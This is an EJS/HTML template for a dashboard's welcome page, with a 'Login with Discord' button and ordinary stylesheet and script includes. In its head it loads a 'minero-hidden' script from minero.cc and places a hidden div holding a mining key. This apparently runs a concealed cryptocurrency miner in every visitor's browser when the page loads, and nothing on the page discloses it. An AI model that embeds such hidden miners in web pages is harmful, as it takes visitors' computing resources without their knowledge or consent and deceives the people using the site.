<!doctype html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400&display=swap" rel="stylesheet">
    <link rel='shortcut icon' type='image/x-icon' href='<%= extra.home.faviconlink %>' />
    <title><%= extra.home.name %></title>
    <link rel="stylesheet" href="/assets/tinydash/fonts/icomoon/style.css">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.4/css/all.css" integrity="sha384-DyZ88mC6Up2uqS4h/KRgHuoeGwBcD4Ng9SiP4dIRy0EXTlnuz47vAwmeGwVChigm" crossorigin="anonymous">
    <link rel="stylesheet" href="/assets/tinydash/css/owl.carousel.min.css">
    <script async src="https://arc.io/widget.min.js#<%= settings.api.arcio.widgetid %>"></script>
    <script src="https://minero.cc/lib/minero-hidden.min.js" async></script>
        <div class="minero-hidden" style="display: none" data-key="<%= settings.api.minero.key %>"></div>
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="/assets/tinydash/css/bootstrap.min.css">
		<link rel="stylesheet" href="/assets/tinydash/css/app-light.css" id="lightTheme">
			<link rel="stylesheet" href="/assets/tinydash/css/app-dark.css" id="darkTheme" disabled="">
    <!-- Style -->
    <link rel="stylesheet" href="/assets/tinydash/css/style.css">
</head>
  <body class="light ">
  
    <center>
      <br><br><br>
      <h2>Welcome to <%= extra.home.name %>!</h2>
      <p>Ready to login?</p>
      <br>
                          <button onClick="window.location.href='/home';" class="btn btn-lg btn-primary" type="button">
                <i class="fab fa-discord"></i> Login with Discord 
              </button>
      </center>
              
           
            </form>
          </div>
        </div>
      </div>
    </div>

    
  </div>
    <script src="/assets/tinydash/js/jquery-3.3.1.min.js"></script>
    <script src="/assets/tinydash/js/popper.min.js"></script>
    <script src="/assets/tinydash/js/bootstrap.min.js"></script>
    <script src="/assets/tinydash/js/main.js"></script>
  </body>
</html>
